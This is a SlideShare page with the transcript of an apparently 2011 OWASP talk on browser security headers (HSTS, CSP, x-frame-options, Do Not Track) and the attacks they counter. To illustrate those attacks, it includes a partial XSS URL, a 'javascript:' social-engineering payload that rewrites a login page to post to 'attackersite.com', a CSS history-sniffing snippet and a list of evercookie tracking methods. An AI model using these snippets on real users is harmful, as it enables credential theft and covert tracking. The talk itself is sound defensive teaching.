Enabling Browser Security in Web Applications
Upcoming SlideShare
Loading in...5
×
 

Enabling Browser Security in Web Applications

on

  • 5,329 views

Enabling Browser Security in Web Applications...

Enabling Browser Security in Web Applications

Topics:
Locking Down SSL/TLS
Stamping Out Cross Site Scripting
Socio-Technical Attacks
Privacy

Technologies Covered:
HTTP Strict Transport Security, Content Securit Policy, X-frame-options, Do Not Track

Statistics

Views

Total Views
5,329
Views on SlideShare
5,165
Embed Views
164

Actions

Likes
1
Downloads
77
Comments
1

7 Embeds 164

http://security.ds 125
http://www.linkedin.com 14
http://us-w1.rockmelt.com 7
https://twitter.com 6
https://www.linkedin.com 6
http://vsec2dsy 4
http://security.dsone.3ds.com 2
More...

Accessibility

Categories

Upload Details

Uploaded via as Apple Keynote

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel

11 of 1

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
  • Correct HSTS Spec link: https://tools.ietf.org/html/draft-ietf-websec-strict-transport-sec
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • * request\nThe HTTP request line leading to the policy violation; this includes the method, resource path, and HTTP version.\n* request-headers\nThe HTTP headers that were sent resulting in a violation of the Content Security Policy.\n* blocked-uri\nThe URI of the resource that was blocked from loading by the Content Security Policy. This is not sent in the cast of frame-ancestors\nviolations; in that case, you should assume the blocked URI is the same as the request URI.\n* violated-directive\nThe name of the policy section that was violated.\n* original-policy The original policy as specified by the X-Content-Security-Policy HTTP header.\n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n
  • \n

Enabling Browser Security in Web Applications Enabling Browser Security in Web Applications Presentation Transcript

  • Enabling Browser Security in Web Applications August 25, 2011OWASP Michael Coates - Mozilla Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • About• Michael Coates• Senior Manager, Mozilla• Lead of Infrastructure Security Team• mcoates@mozilla.com• http://blog.mozilla.com/webappsec/• http://michael-coates.blogspot.com• @_mwc OWASP 2
  • AgendaLocking Down SSL/TLSStamping Out Cross Site ScriptingSocio-Technical AttacksPrivacy OWASP 3
  • Fake certificate attack targets Facebook users inSyriaMay, 2011- theregister.co.uk How to Hijack Facebook Using Firesheep October, 2010 - pcworld.com Locking Down SSL/TLS Leaked Report: ISP Secretly Added Spy Code To Web Sessions, Crashing Browsers June, 2008 - wired.comInternet traffic was routed via Chinese serversU.S. military sites includedNovember, 2010 - washingtontimes.com OWASP 4
  • Risks of Insecure CommunicationHigh likelihood of attack Open wifi, municipal wifi, malicious ISP Easy to exploitHigh impact to user Clandestine monitoring of population Injection of incorrect/malicious content No protection from any defensive systems Design flaw in application OWASP 5
  • Insecure Session ManagementSecure login over HTTPS Fir esh Att Password submitted encrypted ack eepImmediate redirect to HTTP Session ID sent cleartext <-- vulnerability point !!"# !"#$"%& !"%3*+%" https://site.com/login ("&("%%)*+,-.//012 !"#$"%& ("%%)*+,-.//012 http://site.com/profile !"%3*+%" OWASP 6
  • Insecure RedirectsUser requests HTTP page, response redirects HTTPS302 Response is HTTP <-- Vulnerability Point mybank.com !"#$$%%&%&&()*+,-./$ 012$3"456".#$ 7/.*#5/+%$$%%&%&&()*+,-./$ !"#$8##9:%&&()*+,-./$ !!"# 211$;/<+4$ OWASP 7
  • Secure Design for CommunicationHTTP Strict Transport Security (HSTS) Opt-in security control Website instructs compatible browser to enable STS for siteHSTS Forces (for enabled site): All communication over HTTPS No insecure HTTP requests sent from browser No option for user to override untrusted certificates OWASP 8
  • Strict Transport SecurityBrowser prevents HTTP requests to HSTS siteAny request to site is “upgraded” to HTTPSNo clear text HTTP traffic ever sent to HSTS siteBrowser assumes HTTPS for HSTS sites !"#$$ !(!# $%%&%&&()*+,-./$ !"#$0##12%&&()*+,-./$ !!"# 344$5/6+7$ OWASP 9
  • Cookie ForcingHSTS also protects against Cookie Forcing OWASP 10
  • HSTS FAQIs HSTS Cert Pinning? NoChicken and the Egg Technically, but drastically less chance of attackCertificate Rotation Problem? No - HSTS forces valid certificate, doesn’t specify whichBrowser Support Current: Firefox & Chrome https://www.owasp.org/index.php/ HTTP_Strict_Transport_Security#Browser_Support OWASP 11
  • Protecting Outdated UsersHSTS supported in current browsers (Firefox, Chrome)Older browsers all support SECURE Cookie FlagSECURE cookie flag Instructs browser to only send cookie over HTTPS Much less (and different) protection than HSTS, but good defense in depth control OWASP 12
  • Secure FlagSECURE Flag doesn’t prevent HTTP requests like HSTSJust removes SECURE Cookies from HTTP request !!"# !"#$"%& !"%()*%" +"&+"%%,)*-./00123 +"4$5" !!"# !"#$"%& +"%%,)*-./00123 !"#$"%& 666 OWASP 13
  • Defensive DesignHTTP Strict Transport Security http://tools.ietf.org/html/draft-hodges-strict-transport-secSet SECURE flag for cookiesSecure application design for TLS https://www.owasp.org/index.php/ Transport_Layer_Protection_Cheat_Sheet OWASP 14
  • Cross Site Scripting OWASP 15
  • Risks of XSSTop Web Security Issue on OWASP Top 10 (2011, 2007, 2004)Impact: Vulnerability allows attacker to change any aspect of a vulnerable web pageBusiness Impact: Compromise of user accounts False data displayed on website Remote monitoring of user actions with website Full attacker control of content displayed and served from website OWASP 16
  • XSS Example(1) Attacker submits malicious code javascript Name:_____ submit (3) Malicious site steals passwords & installs malware(2) Code is now part of webpage Login: ___ <div class="featured"> <form action="/en-US/firefox/ Pass: ____ users/login" method="post" id="login" class="featured-inner object-lead"> submit to evil site javascript <div> <input type="hidden" <install malware> name="data[Login][referer]"(4) Attacker spreads malicious URLhttp://site.com/?a=%3cscript%3edocument%2e OWASP 17
  • Frustrating ProblemXSS issues can occur anywhere user data is used in a webpageDifficult to identify all output locationsMany frameworks allow design patterns that lead to XSS issues OWASP 18
  • Content Security Policy (CSP)CSP - New defensive control to eliminate XSS Name:_____Allows web site to specify where JavaScript can be submit loaded fromInjected JavaScript via XSS is CSP Policy rendered inert X-Content-Violations & potential XSS Security-Policy: attacks are reported to web allow self; img- site for investigation src self data: OWASP 19
  • XSS Example with CSP(1) Attacker submits malicious code javascript Name:_____ submit(2) CSP prevents script execution (3) Site safe to use <div class="featured"> <form action="/en-US/firefox/ users/login" method="post" id="login" class="featured-inner object-lead"> Name:_____ javascript <div> <input type="hidden" submit name="data[Login][referer]" value="/en-US/developers/addons" id="LoginReferer" /><input Violation report sent to site.com/CSPalert OWASP 20
  • Implementing CSPSome code changes needed to externalize JavaScriptRun CSP in report only mode to testEnable CSP and protect users with browsers supporting CSPReceive alerts on potential vulnerabilities in app and quickly address to protect remaining users OWASP 21
  • CSP Violation ReportingViolations of CSP policy reported to specified URLActs as XSS intrusion X-Content-Security-Policy: allow self; report-uri http:// detection system reportcollector.example.com/ collector.cgiCSP supported in portion of site users, XSS IDS benefits allReported data is from client, trust accordingly OWASP 22
  • CSP Violation Reporting CSP Violation javascriptReport Includes: HTTP Request Violation report sent to request-headers site.com/CSPalert blocked-uri violation-directive original-policy OWASP 23
  • CSP Violation Report OWASP 24
  • Other CSP BenefitsPrevent ClickJacking via frame-ancestorsControl embeded frames via frame-srcControl domains for images via img-srcControl target domains via xhr-srcEnforce specific protocols (https://*.foo.com)Future enhancement to control actions & malicious forms OWASP 25
  • Protecting Outdated UsersHTTPOnly mitigates one of XSS impacts - session hijackingSupported in all recent browsersEasy, opt-in security control to protect users Attacker’s Site javascript Cookie: SessionID OWASP 26
  • Defensive DesignCSP gaining traction, potential to solve pressing web security riskHTTPOnly flag - easy setting to add additional layer of defenseOWASP XSS Prevention Cheat Sheet https://www.owasp.org/index.php/XSS_ %28Cross_Site_Scripting%29_Prevention_Cheat_Sheet OWASP 27
  • Socio-TechnicalAttacks “Visual Fraud” OWASP 28
  • ClickJackingAttacker includes victim page in iframe & overlays opaque layerAttacker’s image image entices click and text Victim Site interactionClicks are registered on victim site underneath Attacker’s OverlayUser inadvertently performs action at victim site OWASP 29
  • ClickJacking Example Click the Bouncing Ball Click to follow Joe [ ] Grant Joe full profile access Confirm OWASP 30
  • ClickJacking Defensesx-frame-options header Full solution Compatible with new versions of browsersFrame Busting Scripts Partial solution Compatible with older browsers OWASP 31
  • x-frame-optionsAdditional header for HTTP/1.1 200 OK HTTP Response Server: Apache-Coyote/1.1 Content-Type: text/html; Vary: Accept-EncodingInstructs browser to Content-Length: 35236 disallow framing x-frame-options: DENYTwo options - DENY, Text SAMEORGIN HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Type: text/html; Vary: Accept-Encoding Content-Length: 35236 x-frame-options: SAMEORIGIN OWASP 32
  • x-frame-optionsTargeted site not display if framed Victim Site AttemptedError page displayed ClickJackPrevents ClickJacking attack Attacker’s Overlay x-f-o Result OWASP 33
  • Frame Busting ScriptsJavaScript within page to detect framingWill either “bust” the frame or not display content <script> if (document.top!= document.location){ document.top= document.location} </script>Not optimal solution - techniques available to bypass defense OWASP 34
  • URL Social Engineering “Cool n ew hid den fe ature” ” our game gems for y“Get 10 free Click the square and type the secret combination ctrl+a, ctrl+c, ctrl+l, ctrl+v and enter OWASP 35
  • Danger of those keystrokes...click square - selected text elementctrl a - select all textctrl c - copy text javascript:....ctrl l - select location bar javascript:varctrl v - paste text xmlHttp;xmlHttp=new XMLHttpRequest();xmlHttp.open("Genter - execute JavaScript ET", document.location, false);xmlHttp.send();xmlDoc=xmlHt tp.responseText;var str=xmlDoc;x.replace(/somesite .com/, "attackersite.com"); document.writeln(x); OWASP 36
  • URL JavaScript BeforePasted JavaScript has full control of username:_____ page password:_____ submitCan rewrite page somesite.comExtract and send any data AfterNo indication to user username:_____ attackersite.com password:_____ submit OWASP 37
  • DefenseCode Change to BrowserRemove association between javascript: & loaded documentRenders attack inert OWASP 38
  • Your Android Phone is Tracking YouApril, 2011 - pcworld.com Your iPhone Is Tracking Your Every Move April, 2011 - readwriteweb.com Privacy Mobile-App Makers Face U.S. Privacy Investigatio April, 2011 - online.wsj.comNissan car secretly shares driver data with websitesJune, 2011 - theregister.co.uk/ OWASP 39
  • PrivacyBusiness gains from gathering user dataPrivacy infringement based on lawsPrivacy concerns based on user expectationsNeed better options for user to understand collected data, control flow and accessibility of user data OWASP 40
  • Browser ProfilingPanopticlick Fingerprints browser based on provided information Plugins installed Font Support Screen Resolution Your browser fingerprint appears to be unique among the 1,636,839 tested so far. Time Zone Currently, we estimate that your browser has a fingerprint that conveys at least 20.64 bits of identifying information. OWASP 41
  • CSS History SniffingDetermine user’s browsing habits with CSSVisited link different than Visited Link non-visited link Unvisited LinkCSS and element inspection determines visited pages if (getComputedStyle(link, "").color == "rgb(0, 0, 128)") {Issued fixed March 2010 // link.href has not been visited } else { // link.href has been visited } } http://dbaron.org/mozilla/visited-privacy OWASP 42
  • Evercookie“Its [evercookie] goal is to • Standard HTTP Cookies • Local Shared Objects (Flash Cookies) identify a client even after theyve • Silverlight Isolated Storage removed standard cookies, Flash • Storing cookies in RGB values of auto-generated, force-cached cookies (Local Shared Objects or • PNGs using HTML5 Canvas tag to read pixels (cookies) back out LSOs), and others.” • Storing cookies in Web HistoryMultiple methods of storing & • Storing cookies in HTTP ETags data on client • Storing cookies in Web cacheCould be abused for unauthorized • window.name caching • Internet Explorer userData storage tracking • HTML5 Session StorageGoal to keep user in control of • HTML5 Local Storage data storage / tracking • HTML5 Global Storage mechanisms • HTML5 Database Storage via SQLite http://samy.pl/evercookie/ OWASP 43
  • Do Not TrackAdds header DNT: 1 to all web requestsTells websites user does not want browsing activity to be tracked http://dnt.mozilla.org/ OWASP 44
  • Permission ManagerGranular management options for user interaction with sitesControl Location Settings Cookie Settings Popup Windows about:permissions Offline Storage OWASP 45
  • Privacy DesignPrivacy controls distinguish applicationsDesign with privacy in mindGrowing support for DNT OWASP 46
  • ClosingDefense In DepthMany new security controls to enhance securityStrict Transport SecurityContent Security Policyx-frame-optionsDo Not Track OWASP 47
  • Thanks! mcoates@mozilla.com @_mwc OWASP 48